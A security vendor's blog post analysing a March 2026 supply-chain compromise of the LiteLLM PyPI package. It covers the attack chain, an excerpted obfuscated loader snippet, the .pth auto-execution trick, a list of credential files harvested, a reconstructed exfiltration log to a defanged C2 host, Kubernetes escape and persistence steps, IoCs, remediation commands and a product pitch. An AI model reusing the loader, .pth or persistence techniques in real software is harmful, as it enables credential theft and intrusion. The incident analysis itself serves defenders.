← All Posts 26 Mar 2026 Vitalii Rudnykh

Security Research

LiteLLM Supply Chain Attack: How 12 Lines of Code Compromised 95 Million Downloads

On March 24, 2026, TeamPCP published two malicious versions of LiteLLM to PyPI. Within three hours, a credential-stealing payload reached AI infrastructure across 36% of monitored cloud environments.

Monthly Downloads

Exposure Window

Exfil Events

Cloud Envs Hit

This Is Not an AI Vulnerability

Before we dive in: this attack has nothing to do with LLM prompt injection, model jailbreaks, or AI safety. It's a software supply chain attack — the same class of threat that hit SolarWinds, Codecov, and ua-parser-js. The target just happens to be AI infrastructure. The vulnerability is in how packages are built, signed, and delivered — not in the models themselves.

What Is LiteLLM?

LiteLLM is a Python library that lets you call 100+ LLM APIs through a single interface. In proxy mode, it becomes a centralized AI gateway handling API keys, load balancing, and spend tracking. It's a transitive dependency in CrewAI, DSPy, MLflow, and LangChain — most teams don't know they run it. A library that handles every API key in your AI stack, installed 95M times per month. A perfect target.

How It Happened

Trivy

Feb 28

KICS

Mar 23

LiteLLM

Mar 24

TeamPCP didn't attack LiteLLM directly. Over the preceding month, they compromised two security scanners — Aqua Trivy and Checkmarx KICS — through misconfigured GitHub Actions, stealing CI/CD credentials at each step. Each compromise yielded tokens that unlocked the next target.

The final link: LiteLLM's CI pipeline ran apt-get install trivy — without pinning a version. It pulled the already-poisoned Trivy v0.69.4, which harvested the PYPI_PUBLISH token — the key to publishing Python packages under the LiteLLM name.

The Injection: Two Techniques in 13 Minutes

Version 1.82.7 (published 10:39 UTC) took the straightforward approach: 12 lines of obfuscated code injected into litellm/proxy/proxy_server.py at lines 128–139. The payload used double-base64 encoding — a ~4KB encoded string that decoded to a temp file and executed via subprocess.run(). It triggered whenever the proxy module was imported — which happens on every litellm --proxy start:

# Lines 128-139 of proxy_server.py (v1.82.7)
import subprocess, sys, base64, tempfile
_enc = "aW1wb3J0IH..."  # double-base64 (~4KB decoded)
_dec = base64.b64decode(base64.b64decode(_enc))
with tempfile.NamedTemporaryFile(suffix='.py', delete=False) as f:
    f.write(_dec); f.flush()
    subprocess.run([sys.executable, f.name])

Version 1.82.8 (published 10:52 UTC — just 13 minutes later) escalated the attack. It kept the proxy_server.py injection but added a far more dangerous mechanism: a litellm_init.pth file included directly in the wheel package.

The .pth Mechanism: Why It's Devastating

Python's .pth files are normally used to extend sys.path, but any line starting with import is executed as code during interpreter initialization — before any user script runs. This means:

The malware fires on any python command — not just LiteLLM imports
It runs before if __name__ == "__main__" — no way to guard against it
The file was correctly declared in the wheel's RECORD file, so pip --require-hashes would have passed — the hash was valid because the malicious content was published with legitimate credentials
It persists across virtualenv recreation — as long as the package is installed, the .pth executes

A critical bug: the .pth launcher spawned child processes via subprocess.Popen, which started new Python interpreters, which triggered the .pth again — creating an exponential fork bomb that crashed machines within seconds. This "bug in the malware" was likely the single biggest factor in accelerating detection, as affected systems became visibly unstable.

PyPI quarantined both versions at approximately 11:25 UTC — roughly three hours after the first publication. During that window, LiteLLM was averaging 3.4 million downloads per day.

The Payload

Click to expand each stage.

Credential Harvester

▶

The first stage performed a comprehensive sweep of the host. It wasn't just reading files — it actively queried APIs to validate and expand the collected credentials:

SSH — id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, config, known_hosts
AWS — ~/.aws/credentials, ~/.aws/config, IMDSv2 metadata (169.254.169.254/latest/meta-data/iam/security-credentials/), ECS task role credentials via $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
GCP — service account JSON files, application default credentials (~/.config/gcloud/), compute metadata tokens
Azure — managed identity tokens via 169.254.169.254/metadata/identity/oauth2/token
Kubernetes — ~/.kube/config, in-cluster service account tokens at /var/run/secrets/kubernetes.io/, enumerated and dumped secrets across all accessible namespaces
CI/CD — Terraform state files (often contain cloud credentials in plaintext), GitLab CI tokens, Jenkins credentials.xml, Travis CI tokens, .npmrc, .pypirc
Databases — .pgpass, my.cnf, Redis/MongoDB connection strings
Crypto wallets — Bitcoin (wallet.dat), Ethereum keystores, Solana keypairs
Application secrets — every .env file reachable from the user's home directory, .gitconfig, shell history (.bash_history, .zsh_history), Slack/Discord webhooks, Stripe API keys, SendGrid tokens

credential sweep — reconstructed from payload analysis

✓ reading ~/.ssh/id_rsa

✓ reading ~/.ssh/id_ed25519

✓ reading ~/.aws/credentials

✓ querying 169.254.169.254/meta-data/iam/

✓ reading ~/.kube/config

✓ dumping kubectl get secrets --all-namespaces

✓ reading /app/.env

✓ reading ~/.config/gcloud/credentials.db

✓ reading ~/.bash_history

✓ archiving tpcp.tar.gz (2.4MB)

✓ encrypting AES-256-CBC → RSA-4096 envelope

✓ POST models.litellm[.]cloud → 200 OK

Encryption Pipeline

The exfiltration wasn't naive. Collected data was encrypted using a multi-layer scheme:

Generate random AES-256-CBC session key + IV
Derive key material using PBKDF2
Encrypt the archive with the session key
Encrypt the session key with a hardcoded 4096-bit RSA public key (only the attacker holds the private key)
Package as tpcp.tar.gz and POST to models.litellm[.]cloud with header X-Filename: tpcp.tar.gz

This means even if you captured the network traffic, you cannot decrypt the exfiltrated data without the attacker's RSA private key.

Kubernetes Lateral Movement

▶

If Kubernetes service account tokens were found on the host, the malware escalated from credential theft to active cluster compromise:

Read cluster secrets across all accessible namespaces via the K8s API
Enumerated all nodes in the cluster
For each node, deployed a privileged alpine:latest pod named node-setup-{node_name} in the kube-system namespace
The pod mounted the host root filesystem at / via hostPath volume
Inside the pod: chroot /host to escape the container, then installed the CanisterWorm backdoor directly on the node's filesystem

Container names alternated between kamikaze and provisioner — the former used for destructive operations, the latter for persistence.

For hosts with Tehran timezone or Farsi language settings, the behavior changed entirely: instead of persisting, the malware deployed a wiper that destroyed Kubernetes cluster data. This targeted destructive capability against Iranian infrastructure suggests geopolitical motivation beyond pure financial gain.

Persistent Backdoor

▶

The final stage ensured long-term access through a systemd user service — requiring no root privileges:

Wrote persistence script to ~/.config/sysmon/sysmon.py
Created systemd user unit at ~/.config/systemd/user/sysmon.service, labeled "System Telemetry Service" to blend in with legitimate monitoring
Initial 300-second sleep before first activation (evade sandbox analysis)
Polled checkmarx[.]zone/raw every ~50 minutes for payload URLs
Downloaded payloads to /tmp/pglog, executed in detached sessions via setsid
Tracked beacon state in /tmp/.pg_state to avoid redundant downloads
Filtered YouTube links as a kill-switch — if the C2 returned a YouTube URL, the payload was skipped (allowing the attacker to "pause" operations)

This persistence survived reboots, pip uninstall litellm, and virtual environment recreation. The only remediation was finding and deleting the sysmon files manually, or rebuilding from a clean image.

When Sonatype researchers attempted to retrieve the C2 payload during analysis, the endpoint returned a link to an English remaster of "Bad Apple!!" — a deliberate troll that also defeated automated sandbox analysis.

Suppression & Impact

When security researchers filed GitHub issue #24512 reporting the compromise, TeamPCP used the stolen maintainer account to close it as "not planned" — making it appear the legitimate maintainers had dismissed the report. The issue was simultaneously flooded with bot comments from accounts matching botnets previously observed during the Trivy disclosure, burying legitimate analysis under noise.

The attack's C2 domain — models.litellm.cloud — was deliberately chosen to mimic legitimate LiteLLM infrastructure, making network-level detection harder for defenders scanning for suspicious domains.

Across the full campaign (Trivy → npm → KICS → LiteLLM), TeamPCP claimed to have "stolen hundreds of gigabytes of data and more than half a million accounts." Over 20,000 repositories were considered potentially vulnerable. LiteLLM itself was present in 36% of monitored cloud environments according to Wiz research.

IoCs & Forensics

Type	Indicator	Context
PyPI	`litellm==1.82.7`	proxy_server.py injection
PyPI	`litellm==1.82.8`	+ .pth persistence
SHA-256 Hashes
proxy_server.py	`a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b`	v1.82.7
litellm_init.pth	`71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238`	v1.82.8
sysmon.py	`6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a`	Backdoor
Network
C2	`models.litellm[.]cloud`	Exfiltration
C2	`checkmarx[.]zone`	Backdoor polling
IP	`45.148.10.212`	aquasecurtiy[.]org
IP	`83.142.209.11`	checkmarx[.]zone
Filesystem & K8s
File	`~/.config/sysmon/sysmon.py`	Persistence
Systemd	`~/.config/systemd/user/sysmon.service`	User service
K8s	`node-setup-{name}`	kube-system pods
Archive	`tpcp.tar.gz`	Exfil bundle

Detection & Remediation

If you installed LiteLLM between Mar 24 10:39–11:25 UTC → full credential exposure.

Check version: pip show litellm | grep Version
Find .pth: find "$(python -c 'import site;print(site.getsitepackages()[0])')" -name "litellm_init.pth"
Check persistence: ls ~/.config/sysmon/ ~/.config/systemd/user/sysmon.service
Audit K8s: kubectl get pods -n kube-system | grep node-setup
Rotate ALL credentials from affected environment
Rebuild from clean image — persistence survives pip uninstall

How Imunify for AI Agents Stops This

Once a package is installed, nothing inspects what it does at runtime. Imunify for AI Agents fills this gap with kernel-level interception — eBPF hooks, fanotify, transparent HTTP proxy.

The Kill Chain — Every Stage Blocked

Step 1

Read credentials

File access frozen. Policy denies read. Secret patterns detected in content.

Step 2

Encrypt & archive

Nothing to encrypt — all reads were denied. Empty result.

Step 3

Send to attacker

Network connection denied at kernel level. Data never leaves the machine.

Step 4

Install backdoor

Write to system directories denied. Persistence never installed.

All 4 stages neutralized — process killed by Imunify for AI Agents

Instant Discovery

eBPF

When LiteLLM starts, a kernel-level sched_process_exec hook detects it instantly — PID tracked before the process runs its first instruction. No polling, no delay.

File Read Blocking

Fanotify

Every file LiteLLM opens is intercepted — the process is frozen in the kernel until policy decides. The compromised version's attempt to sweep credentials from .env, SSH keys, and cloud configs is denied on each read. A content scanner with 200+ secret patterns catches credentials even in unexpected file paths.

Network Correlation

Rules

Cross-event correlation rules catch the exact pattern this attack uses: if LiteLLM (or any tracked process) reads .env files and then attempts an outbound HTTP connection, the connection is automatically blocked — no human decision needed. Unknown destinations require explicit approval via Telegram, Discord, or Web UI before any data leaves the machine.

Behavioral Kill

Auto

When the compromised LiteLLM triggers a rapid burst of blocked file reads — the exact pattern of a credential harvester scanning the filesystem — Imunify for AI Agents automatically kills the process. No human intervention. The attack dies before it finishes its first sweep.

Imunify for AI Agents Blocking the LiteLLM Attack in Real Time

Conclusion

Supply chain attacks cascade. One misconfigured GitHub Action → credential theft → npm → KICS → PyPI. Incomplete remediation at each step left doors open.

Build-time security is necessary but insufficient. Signatures and hashes don't help when a compromised version is published with valid credentials. Runtime interception watches what code does, not where it came from.

Twelve lines. Three hours. Ninety-five million downloads. The next attack won't look like this one — but the syscalls will be the same.